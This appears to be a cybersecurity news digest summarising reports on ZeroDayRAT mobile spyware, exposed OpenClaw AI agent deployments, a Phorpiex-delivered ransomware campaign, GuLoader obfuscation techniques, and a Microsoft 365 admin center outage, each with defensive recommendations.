ZeroDayRAT Mobile Spyware Enables Cross-Platform Surveillance and Financial Theft
Security researchers at iVerify have identified a commercial mobile spyware platform, ZeroDayRAT, openly sold on Telegram, offering full remote control over compromised Android and iOS devices. The platform supports a wide range of operating system versions and is marketed through dedicated sales and support channels, lowering the barrier to entry for cybercriminal buyers. Initial infection typically occurs through smishing links, phishing emails, or fake app downloads that trick victims into installing malicious payloads disguised as legitimate applications. Once installed, the spyware collects detailed device and user data, including SMS messages, app activity, notifications, account information, and GPS location history. The operator dashboard provides real-time visibility into victim behavior, allowing attackers to profile targets and monitor communications without opening individual applications. This level of access enables attackers to bypass SMS-based two-factor authentication and conduct targeted social engineering or account takeover attempts. Beyond passive data collection, ZeroDayRAT includes active surveillance and financial-theft capabilities, significantly increasing its impact. The malware can activate cameras and microphones, record screens, capture keystrokes, and track victims in real time, effectively turning the infected device into a remote surveillance platform. Dedicated modules target banking and cryptocurrency applications, capturing credentials, intercepting one-time passwords, and injecting addresses into the clipboard to redirect digital asset transfers. The cross-platform design and browser-based control panel allow attackers to manage victims globally with minimal technical expertise. Organizations and individuals should restrict installations to official app stores, enable advanced mobile security protections, and deploy mobile threat-detection tools to identify and block unauthorized applications.
Update: Misconfigured OpenClaw Deployments Leave Thousands of AI Agents Open to Takeover
SecurityScorecard’s STRIKE team has identified tens of thousands of internet-exposed OpenClaw (formerly Moltbot and Clawdbot) instances, many of which are running vulnerable versions with full system access. Internet-wide reconnaissance uncovered more than 42,000 exposed control panels across 82 countries, with roughly 15,000 instances vulnerable to remote code execution. The primary issue stems from insecure default configurations, as OpenClaw binds to all network interfaces by default, leaving management panels accessible from the public internet. Many deployments also expose weak authentication, leaked credentials, and unpatched software, creating an easily exploitable attack surface. Researchers observed that a significant portion of exposed instances were correlated with prior breach activity or associated with infrastructure previously linked to known threat actors. The findings indicate that the core risk is not speculative AI autonomy, but poorly secured automation platforms with privileged access to user systems and data. Once compromised, an OpenClaw instance can grant attackers the same permissions as the AI agent, including filesystem access, stored credentials, messaging integrations, and automated actions across connected services. The exposure is compounded by widespread version fragmentation, with most instances running outdated builds that predate critical security patches. Because these agents often operate with privileged identities, compromise enables attackers to impersonate users, access sensitive data, and automate malicious actions at machine speed. The campaign underscores how agentic AI platforms inherit traditional web-application risks but amplify their impact through automation and delegated authority. Organizations should restrict agent interfaces to localhost or VPN-protected networks, enforce strong authentication, patch vulnerable versions, and treat AI agents as privileged systems subject to the same security controls as administrative infrastructure.
Phorpiex Phishing Campaign Uses LNK Files to Deploy Offline GLOBAL GROUP Ransomware
Security researchers at Forcepoint have observed a high-volume phishing campaign leveraging the Phorpiex botnet to deliver GLOBAL GROUP ransomware through weaponized Windows shortcut ([.]lnk) attachments. The emails, typically themed “Your Document,” use hidden file extensions and legitimate icons to appear as harmless Word documents. When executed, the shortcut silently launches cmd[.]exe, which in turn uses PowerShell to download a secondary payload from a remote server. The downloaded binary, often disguised with a system-like name such as windrv[.]exe initiates the ransomware execution chain using Living-off-the-Land techniques to minimize visible activity. Phorpiex, a long-standing malware-as-a-service botnet, is commonly used as an initial access vector for secondary payloads, including ransomware and information stealers. The deployed GLOBAL GROUP ransomware operates in a fully “mute” mode, generating its encryption key locally without contacting command-and-control infrastructure, allowing it to function even in offline or air-gapped environments. The malware includes anti-analysis checks, deletes shadow copies, terminates database and analysis processes, and removes its own binary after execution to reduce forensic artifacts. It also supports lateral movement through Active Directory enumeration and service creation on remote systems. Files are encrypted using the ChaCha20-Poly1305 algorithm and appended with the [.]Reco extension, while ransom notes are dropped across the system. This campaign demonstrates how simple phishing techniques combined with trusted system utilities can enable low-noise, high-impact ransomware delivery. Organizations should block or quarantine executable attachments such as .lnk files, restrict PowerShell abuse, and prioritize behavior-based endpoint detection to identify and stop ransomware activity before encryption completes.
GuLoader Uses Polymorphic Obfuscation and Cloud Services to Deliver Secondary Malware
Zscaler ThreatLabz reports that GuLoader, also known as CloudEye, continues to evolve as a highly obfuscated malware downloader used to deploy information stealers and remote access trojans. Active since at least 2019, the malware relies heavily on legitimate cloud services such as Google Drive and Microsoft OneDrive to host its payloads, allowing it to blend into normal network traffic and bypass reputation-based security controls. Recent variants use polymorphic code that dynamically constructs constants and strings at runtime, making static signatures unreliable and complicating analysis. GuLoader also implements exception-based control flow obfuscation, intentionally triggering CPU exceptions and using custom handlers to redirect execution, which makes automated tracing and debugging significantly more difficult. Over successive versions, the malware has expanded its use of exception types, including single-step, access violation, and illegal-instruction faults, increasing its complexity and resilience against analysis. These techniques collectively enable GuLoader to remain a persistent delivery mechanism for secondary malware families across enterprise environments. Once executed, the downloader retrieves encrypted payloads from these legitimate services and decrypts them in memory, minimizing on-disk artifacts and hindering traditional defenses. GuLoader also protects command-and-control URLs and internal data using XOR-based encryption and polymorphic string construction, making static analysis difficult. The malware’s continued development suggests active maintenance and a long-term role as a commodity delivery platform for multiple threat actors. Its combination of cloud-hosted payloads and advanced anti-analysis techniques allows it to bypass many signature-based and reputation-driven security tools. Organizations should strengthen outbound traffic monitoring, implement behavior-based detection, and restrict unsanctioned access to cloud services to reduce the risk of downloader-based intrusions.
Microsoft 365 Admin Center Outage Impacts North American Enterprise Tenants
On the morning of February 10, 2026, Microsoft acknowledged an active service incident affecting the Microsoft 365 admin center for some business and enterprise customers in North America. Initial telemetry indicated that administrators in the United States and Canada were unable to access the admin portal, while those who could log in experienced degraded functionality. Reports from outage-tracking platforms showed thousands of affected users, with symptoms including connection failures, slow response times, and inaccessible administrative features. Microsoft later confirmed that the disruption also affected the Microsoft 365 application, limiting administrators’ ability to manage tenants or submit support tickets. The company classified the event as a service incident, indicating noticeable user impact across affected regions. As of the latest update, Microsoft stated it was actively analyzing diagnostic telemetry from the admin center infrastructure, with a focus on CPU utilization patterns and user-provided HTTP Archive (HAR) files. The issue remains under investigation, with the scope currently limited to North American tenants, though the full impact has not been disclosed. The next official update is scheduled for 5:30 PM UTC on February 10, 2026, as Microsoft works to isolate the root cause and implement remediation. Organizations relying on the admin center for identity, licensing, and security configuration should prepare for temporary management disruptions until service stability is restored. Administrators should monitor the Microsoft 365 service health dashboard for updates and ensure alternate support and change-management procedures are available during the outage window. This is a developing story.
